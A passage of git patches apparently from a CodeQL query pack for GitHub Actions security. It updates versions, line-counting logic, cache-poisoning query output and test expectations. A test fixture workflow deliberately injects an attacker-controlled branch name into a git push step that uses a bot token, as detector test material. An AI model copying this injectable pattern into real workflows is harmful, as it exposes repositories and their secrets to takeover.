.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | semmle.label | Run Step: git-commit [file-list] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | @@ -617,6 +623,8 @@ subpaths | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | From ee7e50c1cf5787f0a129863d81eea34972e39c0a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 13:42:02 +0100 Subject: [PATCH 644/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 29687dd7a061..9554a52d9348 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.78 +version: 0.1.79 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 7b88d83d38e0..f6fe9791a934 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.78 +version: 0.1.79 groups: [actions, queries] suites: codeql-suites extractor: javascript From 871193095a9eb55a4117f126576bd912df9bad8f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 19:04:02 +0100 Subject: [PATCH 645/707] feat: Add trigger event to cache poisoning queries --- .../Security/CWE-349/CachePoisoningViaDirectCache.ql | 3 ++- .../Security/CWE-094/CodeInjectionMedium.expected | 6 ++++++ .../CWE-349/CachePoisoningViaDirectCache.expected | 12 ++++++------ 3 files changed, 14 insertions(+), 7 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql index 91bb4d3bc5a3..85a0f53df1dc 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql @@ -67,4 +67,5 @@ where ) and not step instanceof PoisonableStep select step, source, step, - "Potential cache poisoning in the context of the default branch " + message + "Potential cache poisoning in the context of the default branch " + message + " ($@).", event, + event.getName() diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 5d1ae7c3e74f..ddfa951241e3 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -13,6 +13,8 @@ edges | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | @@ -232,6 +234,10 @@ nodes | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | semmle.label | Run Step: git-commit [file-list] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected index f45755adf1d7..4cc8536b5943 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected @@ -44,9 +44,9 @@ edges | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | #select -| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache2.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache3.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache5.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache6.yml:4:3:4:21 | pull_request_target | pull_request_target | From 58f060234a066b8aa37212cf249d2c2466f2c4bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 19:17:24 +0100 Subject: [PATCH 646/707] fix: count(text.splitAt()) does not account for all lines, use max(text.splitAt(,i)) instead --- ql/lib/codeql/actions/ast/internal/Ast.qll | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5f33400bb962..574662254144 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -4,12 +4,16 @@ private import codeql.actions.Helper private import codeql.actions.config.Config private import codeql.actions.DataFlow +bindingset[text] +int numberOfLines(string text) { result = max(int i | exists(text.splitAt("\n", i))) } + /** * Gets the length of each line in the StringValue . */ bindingset[text] -int lineLength(string text, int idx) { - exists(string line | line = text.splitAt("\n", idx) and result = line.length() + 1) +int lineLength(string text, int i) { + i in [0 .. numberOfLines(text)] and + result = text.splitAt("\n", i).length() + 1 } /** @@ -17,7 +21,7 @@ int lineLength(string text, int idx) { */ bindingset[text] int partialLineLengthSum(string text, int i) { - i in [0 .. count(text.splitAt("\n"))] and + i in [0 .. numberOfLines(text)] and result = sum(int j, int length | j in [0 .. i] and length = lineLength(text, j) | length) } From fcc7efbc5cd73824835b157118b38374e2b5d0bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 19:19:06 +0100 Subject: [PATCH 647/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 9554a52d9348..29a1796e1826 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.79 +version: 0.1.80 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f6fe9791a934..a1caa7027909 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.79 +version: 0.1.80 groups: [actions, queries] suites: codeql-suites extractor: javascript From 685c9e97ccf05aea3bcd2569adcfde71a18e2989 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 21:17:55 +0100 Subject: [PATCH 648/707] Bump qlpack versions --- ql/lib/codeql/actions/ast/internal/Ast.qll | 5 +---- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 3 files changed, 3 insertions(+), 6 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 574662254144..1589b18efb02 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -11,10 +11,7 @@ int numberOfLines(string text) { result = max(int i | exists(text.splitAt("\n", * Gets the length of each line in the StringValue . */ bindingset[text] -int lineLength(string text, int i) { - i in [0 .. numberOfLines(text)] and - result = text.splitAt("\n", i).length() + 1 -} +int lineLength(string text, int i) { result = text.splitAt("\n", i).length() + 1 } /** * Gets the sum of the length of the lines up to the given index. diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 29a1796e1826..a33cecb6fe03 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.80 +version: 0.1.81 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a1caa7027909..6d1bc8634ba8 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.80 +version: 0.1.81 groups: [actions, queries] suites: codeql-suites extractor: javascript From f76d4d67d990d5b32c46bd0878da432eec491c83 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 22:31:15 +0100 Subject: [PATCH 649/707] tests: update tests --- .../.github/workflows/publishResults.yml | 14 ++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 16 ++++++++-------- .../CWE-094/CodeInjectionMedium.expected | 12 ++++++------ 3 files changed, 28 insertions(+), 14 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml index 17d9680d9074..b4c2ecaec700 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml @@ -60,6 +60,20 @@ jobs: id: git-commit if: steps.search-patch.outputs.result run: | + set -x + # Set initial placeholder name/mail and read it from the patch later + git config --global user.email 'foo@bar' + git config --global user.name 'Foo Bar' + + git am version_increments.patch + + # Read the author's name+mail from the just applied patch and recommit it with both set as committer + botMail=$(git log -1 --pretty=format:'%ae') + botName=$(git log -1 --pretty=format:'%an') + git config --global user.email "${botMail}" + git config --global user.name "${botName}" + git commit --amend --no-edit + fileList=$(git diff-tree --no-commit-id --name-only HEAD -r) echo "file-list<> $GITHUB_OUTPUT echo "$fileList" >> $GITHUB_OUTPUT diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 5187e875cb73..a862c0901ca7 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -13,8 +13,8 @@ edges | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | @@ -234,10 +234,10 @@ nodes | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | semmle.label | Run Step: git-commit [file-list] | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> 